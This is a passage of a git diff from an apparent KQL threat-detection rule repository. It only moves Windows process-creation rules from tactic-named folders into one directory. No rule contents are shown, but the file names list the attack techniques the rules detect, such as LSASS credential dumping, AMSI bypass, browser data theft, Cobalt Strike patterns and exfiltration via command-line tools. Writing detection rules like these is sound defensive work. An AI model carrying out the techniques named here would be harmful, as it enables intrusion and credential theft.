KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql diff --git a/KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_firewall_rule_added_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql diff --git a/KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql similarity index 100% rename from KQL/rules/Credential Access/new_generic_credentials_added_via_cmdkey_exe.kql rename to KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql diff --git a/KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql rename to KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql diff --git a/KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Discovery/new_network_trace_capture_started_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql diff --git a/KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql diff --git a/KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_process_created_via_taskmgr_exe.kql rename to KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/new_process_created_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql diff --git a/KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql similarity index 100% rename from KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql rename to KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_root_certificate_installed_via_certmgr_exe.kql rename to KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql diff --git a/KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/new_root_certificate_installed_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql diff --git a/KQL/rules/Persistence/new_service_creation_using_powershell.kql b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql similarity index 100% rename from KQL/rules/Persistence/new_service_creation_using_powershell.kql rename to KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql diff --git a/KQL/rules/Persistence/new_service_creation_using_sc_exe.kql b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql similarity index 100% rename from KQL/rules/Persistence/new_service_creation_using_sc_exe.kql rename to KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql similarity index 100% rename from KQL/rules/Persistence/new_user_created_via_net_exe.kql rename to KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql diff --git a/KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql similarity index 100% rename from KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql rename to KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql similarity index 100% rename from KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql rename to KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql diff --git a/KQL/rules/Discovery/nltest_exe_execution.kql b/KQL/rules/windows/process_creation/nltest_exe_execution.kql similarity index 100% rename from KQL/rules/Discovery/nltest_exe_execution.kql rename to KQL/rules/windows/process_creation/nltest_exe_execution.kql diff --git a/KQL/rules/Defense Evasion/node_process_executions.kql b/KQL/rules/windows/process_creation/node_process_executions.kql similarity index 100% rename from KQL/rules/Defense Evasion/node_process_executions.kql rename to KQL/rules/windows/process_creation/node_process_executions.kql diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql similarity index 100% rename from KQL/rules/Execution/nodejs_execution_of_javascript_file.kql rename to KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql similarity index 100% rename from KQL/rules/Execution/non_interactive_powershell_process_spawned.kql rename to KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql diff --git a/KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql similarity index 100% rename from KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql rename to KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql diff --git a/KQL/rules/Discovery/notepad_password_files_discovery.kql b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql similarity index 100% rename from KQL/rules/Discovery/notepad_password_files_discovery.kql rename to KQL/rules/windows/process_creation/notepad_password_files_discovery.kql diff --git a/KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql similarity index 100% rename from KQL/rules/Defense Evasion/nslookup_powershell_download_cradle_processcreation.kql rename to KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql diff --git a/KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/ntdllpipe_like_activity_execution.kql rename to KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql diff --git a/KQL/rules/Discovery/obfuscated_ip_download_activity.kql b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql similarity index 100% rename from KQL/rules/Discovery/obfuscated_ip_download_activity.kql rename to KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql diff --git a/KQL/rules/Discovery/obfuscated_ip_via_cli.kql b/KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql similarity index 100% rename from KQL/rules/Discovery/obfuscated_ip_via_cli.kql rename to KQL/rules/windows/process_creation/obfuscated_ip_via_cli.kql diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql similarity index 100% rename from KQL/rules/Defense Evasion/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql rename to KQL/rules/windows/process_creation/obfuscated_powershell_msi_install_via_windowsinstaller_com.kql diff --git a/KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql b/KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/obfuscated_powershell_oneliner_execution.kql rename to KQL/rules/windows/process_creation/obfuscated_powershell_oneliner_execution.kql diff --git a/KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql b/KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/odbcconf_exe_suspicious_dll_location.kql rename to KQL/rules/windows/process_creation/odbcconf_exe_suspicious_dll_location.kql diff --git a/KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql b/KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql similarity index 100% rename from KQL/rules/Defense Evasion/onenote_exe_execution_of_malicious_embedded_scripts.kql rename to KQL/rules/windows/process_creation/onenote_exe_execution_of_malicious_embedded_scripts.kql diff --git a/KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql similarity index 100% rename from KQL/rules/Defense Evasion/openwith_exe_executes_specified_binary.kql rename to KQL/rules/windows/process_creation/openwith_exe_executes_specified_binary.kql diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql similarity index 100% rename from KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql rename to KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_commands.kql diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql similarity index 100% rename from KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql rename to KQL/rules/windows/process_creation/operator_bloopers_cobalt_strike_modules.kql diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql similarity index 100% rename from KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql rename to KQL/rules/windows/process_creation/outlook_enableunsafeclientmailrules_setting_enabled.kql diff --git a/KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql b/KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/password_provided_in_command_line_of_net_exe.kql rename to KQL/rules/windows/process_creation/password_provided_in_command_line_of_net_exe.kql diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql similarity index 100% rename from KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql rename to KQL/rules/windows/process_creation/password_set_to_never_expire_via_wmi.kql diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql similarity index 100% rename from KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql rename to KQL/rules/windows/process_creation/pdq_deploy_remote_adminstartion_tool_execution.kql diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/windows/process_creation/perl_inline_command_execution.kql similarity index 100% rename from KQL/rules/Execution/perl_inline_command_execution.kql rename to KQL/rules/windows/process_creation/perl_inline_command_execution.kql diff --git a/KQL/rules/Discovery/permission_check_via_accesschk_exe.kql b/KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql similarity index 100% rename from KQL/rules/Discovery/permission_check_via_accesschk_exe.kql rename to KQL/rules/windows/process_creation/permission_check_via_accesschk_exe.kql diff --git a/KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql b/KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql similarity index 100% rename from KQL/rules/Credential Access/permission_misconfiguration_reconnaissance_via_findstr_exe.kql rename to KQL/rules/windows/process_creation/permission_misconfiguration_reconnaissance_via_findstr_exe.kql diff --git a/KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql b/KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql similarity index 100% rename from KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql rename to KQL/rules/windows/process_creation/persistence_via_sticky_key_backdoor.kql diff --git a/KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql b/KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql similarity index 100% rename from KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql rename to KQL/rules/windows/process_creation/persistence_via_typedpaths_commandline.kql diff --git a/KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql b/KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql similarity index 100% rename from KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql rename to KQL/rules/windows/process_creation/phishing_pattern_iso_in_archive.kql diff --git a/KQL/rules/Execution/php_inline_command_execution.kql b/KQL/rules/windows/process_creation/php_inline_command_execution.kql similarity index 100% rename from KQL/rules/Execution/php_inline_command_execution.kql rename to KQL/rules/windows/process_creation/php_inline_command_execution.kql diff --git a/KQL/rules/Defense Evasion/ping_hex_ip.kql b/KQL/rules/windows/process_creation/ping_hex_ip.kql similarity index 100% rename from KQL/rules/Defense Evasion/ping_hex_ip.kql rename to KQL/rules/windows/process_creation/ping_hex_ip.kql diff --git a/KQL/rules/Discovery/pktmon_exe_execution.kql b/KQL/rules/windows/process_creation/pktmon_exe_execution.kql similarity index 100% rename from KQL/rules/Discovery/pktmon_exe_execution.kql rename to KQL/rules/windows/process_creation/pktmon_exe_execution.kql diff --git a/KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql b/KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql similarity index 100% rename from KQL/rules/Command and Control/port_forwarding_activity_via_ssh_exe.kql rename to KQL/rules/windows/process_creation/port_forwarding_activity_via_ssh_exe.kql diff --git a/KQL/rules/Impact/portable_gpg_exe_execution.kql b/KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql similarity index 100% rename from KQL/rules/Impact/portable_gpg_exe_execution.kql rename to KQL/rules/windows/process_creation/portable_gpg_exe_execution.kql diff --git a/KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql b/KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql similarity index 100% rename from KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql rename to KQL/rules/windows/process_creation/possible_privilege_escalation_via_weak_service_permissions.kql diff --git a/KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql b/KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql similarity index 100% rename from KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql rename to KQL/rules/windows/process_creation/potential_active_directory_enumeration_using_ad_module_proccreation.kql diff --git a/KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_adplus_exe_abuse.kql rename to KQL/rules/windows/process_creation/potential_adplus_exe_abuse.kql diff --git a/KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql similarity index 100% rename from KQL/rules/Command and Control/potential_amazon_ssm_agent_hijacking.kql rename to KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_amsi_bypass_using_null_bits.kql rename to KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql diff --git a/KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_amsi_bypass_via_net_reflection.kql rename to KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql diff --git a/KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_application_whitelisting_bypass_via_dnx_exe.kql rename to KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_arbitrary_code_execution_via_node_exe.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_arbitrary_command_execution_using_msdt_exe.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql diff --git a/KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_arbitrary_command_execution_via_ftp_exe.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_arbitrary_dll_load_using_winword.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql diff --git a/KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_arbitrary_file_download_using_office_application.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql rename to KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql similarity index 100% rename from KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql rename to KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql diff --git a/KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_binary_proxy_execution_via_cdb_exe.kql rename to KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql diff --git a/KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql rename to KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql diff --git a/KQL/rules/Credential Access/potential_browser_data_stealing.kql b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql similarity index 100% rename from KQL/rules/Credential Access/potential_browser_data_stealing.kql rename to KQL/rules/windows/process_creation/potential_browser_data_stealing.kql diff --git a/KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql similarity index 100% rename from KQL/rules/Execution/potential_cobaltstrike_process_patterns.kql rename to KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql diff --git a/KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql similarity index 100% rename from KQL/rules/Command and Control/potential_com_objects_download_cradles_usage_process_creation.kql rename to KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql diff --git a/KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_command_line_path_traversal_evasion_attempt.kql rename to KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql rename to KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql rename to KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql diff --git a/KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql b/KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql similarity index 100% rename from KQL/rules/Execution/potential_commandline_path_traversal_via_cmd_exe.kql rename to KQL/rules/windows/process_creation/potential_commandline_path_traversal_via_cmd_exe.kql diff --git a/KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_configuration_and_service_reconnaissance_via_reg_exe.kql rename to KQL/rules/windows/process_creation/potential_configuration_and_service_reconnaissance_via_reg_exe.kql diff --git a/KQL/rules/Execution/potential_cookies_session_hijacking.kql b/KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql similarity index 100% rename from KQL/rules/Execution/potential_cookies_session_hijacking.kql rename to KQL/rules/windows/process_creation/potential_cookies_session_hijacking.kql diff --git a/KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql similarity index 100% rename from KQL/rules/Credential Access/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql rename to KQL/rules/windows/process_creation/potential_credential_dumping_attempt_using_new_networkprovider_cli.kql diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql similarity index 100% rename from KQL/rules/Credential Access/potential_credential_dumping_via_lsass_process_clone.kql rename to KQL/rules/windows/process_creation/potential_credential_dumping_via_lsass_process_clone.kql diff --git a/KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql b/KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql similarity index 100% rename from KQL/rules/Credential Access/potential_credential_dumping_via_wer.kql rename to KQL/rules/windows/process_creation/potential_credential_dumping_via_wer.kql diff --git a/KQL/rules/Impact/potential_crypto_mining_activity.kql b/KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql similarity index 100% rename from KQL/rules/Impact/potential_crypto_mining_activity.kql rename to KQL/rules/windows/process_creation/potential_crypto_mining_activity.kql diff --git a/KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql b/KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql similarity index 100% rename from KQL/rules/Execution/potential_data_exfiltration_activity_via_commandline_tools.kql rename to KQL/rules/windows/process_creation/potential_data_exfiltration_activity_via_commandline_tools.kql diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql rename to KQL/rules/windows/process_creation/potential_data_stealing_via_chromium_headless_debugging.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_3.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_binary_rename.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_binary_rename.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_rename_of_highly_relevant_binaries.kql diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql similarity index 100% rename from KQL/rules/Defense Evasion/potential_defense_evasion_via_right_to_left_override.kql rename to KQL/rules/windows/process_creation/potential_defense_evasion_via_right_to_left_override.kql diff --git a/KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql similarity index 100% rename from KQL/rules/Discovery/potential_discovery_activity_via_dnscmd_exe.kql rename to KQL/rules/windows/process_creation/potential_discovery_activity_via_dnscmd_exe.kql diff --git a/KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql b/KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql similarity index 100% rename from KQL/rules/Command and Control/potential_dll_file_download_via_powershell_invoke_webrequest.kql rename to KQL/rules/windows/process_creation/potential_dll_file_download_via_powershell_invoke_webrequest.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql rename to KQL/rules/windows/process_creation/potential_dll_injection_or_execution_using_tracker_exe.kql diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql similarity index 100% rename from KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql rename to KQL/rules/windows/process_creation/potential_dll_injection_via_acccheckconsole.kql diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql rename to KQL/rules/windows/process_creation/potential_dll_sideloading_via_deviceenroller_exe.kql diff --git a/KQL/rules/Execution/potential_dosfuscation_activity.kql b/KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql similarity index 100% rename from KQL/rules/Execution/potential_dosfuscation_activity.kql rename to KQL/rules/windows/process_creation/potential_dosfuscation_activity.kql diff --git a/KQL/rules/Command and Control/potential_download_upload_activity_using_type_command.kql 